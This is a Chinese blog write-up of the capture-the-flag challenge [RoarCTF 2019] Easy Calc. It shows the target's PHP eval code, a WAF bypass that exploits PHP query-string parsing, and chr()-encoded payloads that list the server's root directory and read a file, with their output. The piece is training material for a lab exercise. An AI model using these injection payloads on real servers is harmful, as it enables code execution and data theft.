BUUCTF WEB [RoarCTF 2019]Easy Calc

最新推荐文章于 2023-03-14 21:21:34 发布
最新推荐文章于 2023-03-14 21:21:34 发布
阅读量348 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/124219807
版权

BUUCTF WEB [RoarCTF 2019]Easy Calc

  • F12查看页面源代码

    <!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>简单的计算器</title>
  
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="./libs/bootstrap.min.css">
  <script src="./libs/jquery-3.3.1.min.js"></script>
  <script src="./libs/bootstrap.min.js"></script>
</head>
<body>

<div class="container text-center" style="margin-top:30px;">
  <h2>表达式</h2>
  <form id="calc">
    <div class="form-group">
      <input type="text" class="form-control" id="content" placeholder="输入计算式" data-com.agilebits.onepassword.user-edited="yes">
    </div>
    <div id="result"><div class="alert alert-success">
            </div></div>
    <button type="submit" class="btn btn-primary">计算</button>
  </form>
</div>
<!--I've set up WAF to ensure security.-->
<script>
    $('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })
</script>

</body></html>

    访问calc.php

    <?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

  • 可以看出原页面通过js将表达式传给calc.php,同时calc.php对传入的参数进行了一些限制后使用eval函数输出结果

  • 尝试提交非数字的字符报错,可能是num变量被waf过滤

  • 这里需要利用PHP的字符串解析特性

    PHP会将查询字符串(在URL或正文中)转换为内部$_GET等关联数组

    /?foo=bar会变成Array([foo] => "bar")

    在这个过程中某些字符会被删除或用下划线代替

    /?%20news[id%00=42会变成Array([news_id] => 42)

    所以在num前加个空格后WAF会找不到num这个变量,而PHP会将参数转换为有效的变量名,将空格删除

  • 尝试扫描当前文件夹

    ? num=1;var_dump(scandir(chr(47)))

    1array(24) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(5) "f1agg" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(3) "opt" [14]=> string(4) "proc" [15]=> string(4) "root" [16]=> string(3) "run" [17]=> string(4) "sbin" [18]=> string(3) "srv" [19]=> string(8) "start.sh" [20]=> string(3) "sys" [21]=> string(3) "tmp" [22]=> string(3) "usr" [23]=> string(3) "var" }

    找到flag文件f1agg

  • 读取flag文件

    ? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

    1string(43) "flag{78db4d11-a484-4a97-b58b-a0b1d010f7b9} "
Y1Daa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SimpleCalc:这是一个非常简单的计算器,它使用基本运算符和浮点数
03-07
简单计算 这是一个非常简单的计算器,它使用基本运算符和浮点数。 使用:python3 Calc.py
BUUCTF WEB [RoarCTF 2019]Easy Calc(小宇特详解)
小宇的web博客
01-18 718
BUUCTF WEB [RoarCTF 2019]Easy Calc(小宇特详解) 打开网页后是这样的。 这里先查看一下源代码 这里显示是有waf的,直接访问一下calc.php来查看。 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n
BUUCTF-web类-第六题 [RoarCTF 2019]Easy Calc
weixin_44622228的博客
04-17 390
BUUCTF-web类-第六题 [RoarCTF 2019]Easy Calc 进入靶场,发现只有一个计算器的页面, 输入1+2看看,返回了答案3 常规想法,输入单引号试试,弹出了一个窗口 经过多个字符测试,发现都会导致弹窗,这时候我们看看F12看看, 有一段注释说这题有WAF,那肯定思路就是如何绕过WAF拿到flag了 注释下还有一段js代码,通过代码可以发现还有个calc.php页面,于是...
BUUCTF [RoarCTF 2019] Easy Calc
Senimo
03-29 727
BUUCTF [RoarCTF 2019] Easy Calc Web writeup 启动靶机,打开页面: 一个简单的计算器页面,查看网页源码: 提示设置了WAF以确保安全,尝试访问calc.php: 得到了WAF源码,分析代码: 需要传入变量num的值 设置了一系列黑名单的值 如果传入的变量num中有黑名单包括的符号,将终止程序 否则将输出num的内容 根据PHP的解析规则:如果变量...
buuctf Easy Calc 笔记记录
SopRomeo的博客
01-29 722
查看源代码,发现有个防火墙 里面有个php文件,进去看看 emmmmm,过滤了一堆字符,这边学到了php的东西,当个web狗啥都要学啊 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符 2.将某些字符转换为下划线(包括空格) ...
Calc Easy-开源
05-29
【标题】"Calc Easy-开源"是一个开源软件项目,它提供了一个相当简单的快速计算器的实现。这个项目的重点在于它的开源特性,意味着源代码是公开的,任何人都可以查看、学习、修改或分发这个计算器的代码。开源软件的...
calc-ui-web
02-26
【标题解析】:“calc-ui-web”这个标题暗示我们正在处理一个与计算器用户界面相关的Web项目。"calc-ui"部分指的是计算器的用户界面,而“web”则表明这是在Web环境中实现的。考虑到“calc-ui-web”可能是项目的名字...
calcCalc Web服务
03-03
安全方面,Calc Web服务需要考虑防止XSS(跨站脚本攻击)和CSRF(跨站请求伪造)等常见Web安全问题。通过验证用户输入、使用HTTP头部的CSRF令牌以及实施同源策略,可以有效地保护服务免受这些威胁。 对于数据持久化...
my_calc.rar_calc
09-24
而“rar_calc”则可能表明这个项目是以RAR压缩格式存储,且包含一个名为“calc”的特定部分或文件,这通常是源代码、可执行文件或者相关的配置文件。 Delphi7作为Windows应用程序的主要开发工具,它提供了直观的...
CRC_Calc .rar
12-04
CRC_Calc是一个专门用于计算CRC值的软件工具,它支持多种CRC算法,能够帮助用户快速、准确地对数据进行校验。 CRC_Calc v0.1是这个压缩包中的主要程序,它可能是一个命令行工具或者具有图形用户界面的应用,使得非...
[RoarCTF 2019] Easy Calc
veinard_F的博客
06-05 276
打开题目后是一个计算的页面,通过尝试发现只能计算数字 查看页面源码 根据框出的部分可以访问一下calc.php,得到隐藏信息 从代码中可以知道绕过waf之后会有一个eval执行函数 首先说一下对于waf的绕过,由于php在执行的时候会自动忽略掉空格字符,包含换行回车等,而waf不可以,所以可以构造一个payload为 ?num=var_dump(scandir(chr(47))) 出现了f1a...
Buuctf(Easy Calc 1)
m0_64444909的博客
04-14 2871
一、解题步骤 (1)发现了一个可以得到计算结果的输入框,说明这题应该是一道注入题,或者注入类似的题目,我们输几个数字发现可以得到正确答案,但输入字母就会报错。我们看一下html源码,发现 calc.php?num=encodeURIComponent($("#content").val()) (2)我们访问 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt impo
CTF--BUUCTF-WEB-EasySQL+Easy Calc
qq_42404383的博客
01-13 1426
CTF–BUUCTF-WEB-EasySQL+Easy Calc 一、[极客大挑战 2019]EasySQL ​ 题目如图: 简单的注入一下: 把密码长度加长一些试试: 二、Easy Calc–简单的计算器 题目: 分析: 提示有WAF、拿节点content的值去后台运算 解题: 上面行不通、要从WAF着手了(我是不会了) 换个思路、题目还是得做–>> 搜达寺内、...
[RoarCTF 2019]Easy Calc1详细多种题解+整体思考路程(必看)
m0_73728268的博客
03-14 306
1.学习了php对于字符串解析字符串2.对php函数不熟悉3.第一次见http走私漏洞4.基本绕过方法不熟悉。
[RoarCTF 2019]Easy Calc
xj28555的博客
09-02 348
进入题目是一个计算器的功能界面 查看源代码,可以发现是有WAF的,且存在一个calc.php文件 这里接收一个num参数,可以看到这里创建了一个黑名单列表,然后用正则是去匹配,进行非法参数的过滤。 那这题就是要绕过这个过滤和过一个WAF了。先传入一个?num=1测试一下。 传入字母就会报错,这里应该是被WAF文件给拦截了。 要对这WAF进行绕过,这里就涉及到一个知识点了。 PHP的字符串解析特性 我们知道PHP将查询字符串(在URL或正文中)转换
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1867
[RoarCTF 2019]Easy Java
自己做web题的文章整合(后续应该还会在更)
BvxiE的博客
08-14 383
首先了解一下题目Easy Calc的意思:嗯…没啥用!
BUUCTF】 [RoarCTF 2019]Easy Calc 详细题解笔记 Writeup
algae
08-13 1958
BUUCTF】 [RoarCTF 2019]Easy Calc一. playload1.scandir("/")函数读取目录,/ 被过滤所以换为chr(47)绕过(1).同1,但空格换为+(2).这里的chr(47)也可以换为hex2bin(dechex(47))(3).(4).(5).2.http走私绕过WAF4.5.二. 基础知识1.利用PHP的字符串解析特性Bypass2.[PHP chr() 函数:chr(ascii)](https://www.w3school.com.cn/php/func_s
[roarctf 2019]easy calc
最新发布
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值